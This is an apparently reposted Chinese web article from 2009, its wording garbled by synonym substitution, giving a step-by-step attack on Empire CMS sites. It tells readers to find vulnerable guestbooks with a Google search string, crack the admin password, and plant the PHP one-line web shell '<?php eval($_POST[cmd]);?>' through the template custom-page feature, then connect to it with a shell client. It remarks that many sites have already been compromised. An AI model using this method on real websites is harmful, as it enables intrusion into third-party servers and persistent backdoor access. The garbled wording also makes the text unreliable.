> 网站安详 > 正文 帝国CMS体系注入裂痕 2009-07-09 23:43:34 我要投稿
Qglfnts Blog
话嗣魅这个洞也出来一段时刻了(注:可以看这里:),看到网上那些站都被日了。
直接说怎样操作。
打开Google以要害字inurl:e/tool/gbook/?bid=1举办搜刮。
搜刮出来的是留言本,着实就是留言本呈现裂痕了。
如图
品德好的话,暗码破解乐成后进入网站靠山,靠山地点 e/admin/
接着拿shell,进入靠山后点顶部模板打点。
然后左边的自界说页面-增进自界说页面,页面内容填写PHP一句话,<?php eval($_POST[cmd]);?>
完了,回到打点自界说页面,点击适才起的页面名称。页面直接跳转到e/admin/template/x.php,提醒会找不到页面,去掉template即可。真实地点是e/admin/x.php,如表现一片空缺的话就乐成了。
最后用lanker微型PHP+ASP双用版毗连一句话即可。
提醒:别断念眼啊,自界说页面内容可以改成ASP的。
点击复制链接 与挚友分享!回本站首页 您对本文章有什么意见或着疑问吗?请到论坛接头您的存眷和提议是我们前行的参考和动力 上一篇:FCKeditor connectors模块多个跨站剧本及目次遍历裂痕 下一篇:风渡科技ASP网上购物体系0905-1版裂痕 相干文章
帝国CMS体系注入裂痕说明
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did26774